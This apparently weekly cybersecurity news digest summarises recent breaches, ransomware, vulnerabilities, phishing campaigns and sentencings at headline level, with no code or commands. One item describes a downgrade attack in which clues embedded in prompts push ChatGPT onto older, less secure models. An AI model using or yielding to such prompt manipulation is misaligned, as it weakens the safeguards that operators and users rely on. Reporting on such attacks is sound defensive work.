Major Incidents or Breaches#

  • Colt Technology Services Ransomware Attack

    • UK-based Colt Technology Services confirmed a data breach involving customer documentation theft. The Warlock ransomware gang is auctioning the stolen files. The company is working to restore disrupted systems.

  • Orange Belgium Data Breach

    • Orange Belgium disclosed that attackers accessed data of approximately 850,000 customers during a July cyberattack. The breach affected customer accounts but no further technical details were provided.

  • Ex-Developer Sentenced for Sabotage

    • A former developer was sentenced to four years in prison for deploying custom malware and a kill switch on his ex-employer’s network, locking out employees after his account was disabled.

  • Scattered Spider Member Sentenced

    • Noah Michael Urban, a member of the Scattered Spider cybercrime group, was sentenced to 10 years in prison for wire fraud and conspiracy related to high-profile attacks.

Newly Discovered Vulnerabilities#

  • Apple Zero-Day Vulnerability (CVE-2025-43300)

    • Apple released security updates for iOS and macOS platforms to patch a zero-day vulnerability exploited in targeted attacks. All users are advised to update.

  • Commvault Pre-Auth Exploit Chains

    • Four vulnerabilities in Commvault (including pre-authentication exploit chains) were disclosed and patched. These flaws could enable remote code execution on vulnerable instances.

  • Password Managers Clickjacking Risk

    • Security research revealed that nearly a dozen password managers are vulnerable to clickjacking attacks, potentially allowing data theft via manipulated UI elements.

  • ChatGPT Downgrade Attack

    • A downgrade attack was demonstrated, allowing users to coerce ChatGPT into using older, less secure models by embedding specific clues in prompts, undermining GPT-5 security.

Notable Threat Actor Activity#

  • Russian APT Exploiting Cisco Vulnerability

    • The FBI reported that Russian state-sponsored group Static Tundra (linked to the FSB) is exploiting a 7-year-old Cisco vulnerability (CVE-2018-0171) to target critical infrastructure.

  • Warlock Ransomware

    • The Warlock ransomware gang is responsible for the Colt Technology Services breach and is actively auctioning stolen data.

  • CORNFLAKE.V3 Backdoor Deployment

    • Threat actors are using the ClickFix social engineering tactic and fake CAPTCHA pages to deploy the CORNFLAKE.V3 backdoor, as observed by Mandiant.

  • QuirkyLoader Malware Campaigns

    • QuirkyLoader, a new malware loader, is being used in email spam campaigns to deliver payloads such as Agent Tesla, AsyncRAT, and Snake Keylogger.

  • Phishing Attacks Targeting Brokerage Accounts

    • Professional phishing groups are targeting brokerage firm customers using “ramp and dump” techniques to manipulate stock prices for financial gain.

  • Booking.com Homoglyph Phishing

    • Attackers are impersonating Booking.com using homoglyph attacks, substituting Japanese Unicode characters for forward slashes in phishing URLs to evade detection.

  • HR Impersonation Phishing Surge

    • HR-related phishing attacks surged by 120% in Q1 2025, with attackers using “urgent payroll update” lures and quishing (QR code phishing) with encrypted SVG payloads.

  • Social Engineering in Industrial and OT Environments

    • Social engineering attacks are increasing in operational technology (OT) sectors, targeting industrial organisations with phishing and manipulation techniques.

  • Abuse of VPS Infrastructure

    • Threat actors are increasingly leveraging legitimate virtual private server (VPS) services for rapid, stealthy infrastructure deployment.

  • Weak Passwords and Account Compromise

    • The Blue Report 2025 highlights that weak passwords and compromised credentials remain primary factors in impactful cyberattacks, more so than advanced exploits.

  • Phishing and MFA Social Engineering

    • Attackers are evolving their phishing tactics to target MFA processes, with a focus on exploiting help desk and frontline support agents through social engineering.

  • AI and LLMs in Security

    • New frameworks such as Tree of AST are using large language models (LLMs) to enhance vulnerability discovery. DARPA’s AI Cyber Challenge demonstrated the use of automation to patch vulnerabilities at scale.

  • EV Smart Charging Security Risks

    • The new ISO 15118 standard for EV smart charging introduces cyber risks, as vehicle-to-grid communications can be weaponised if not properly secured.

Regulatory or Policy Developments Affecting the Security Industry#

  • Fake Europol Reward for Qilin Ransomware

    • Europol confirmed that a Telegram channel offering a $50,000 reward for information on Qilin ransomware administrators was fraudulent and not affiliated with the agency.

  • Google Settles YouTube Child Privacy Lawsuit

    • Google agreed to a $30 million settlement over allegations of YouTube’s data collection practices involving minors, though the company did not admit to targeting children for advertising.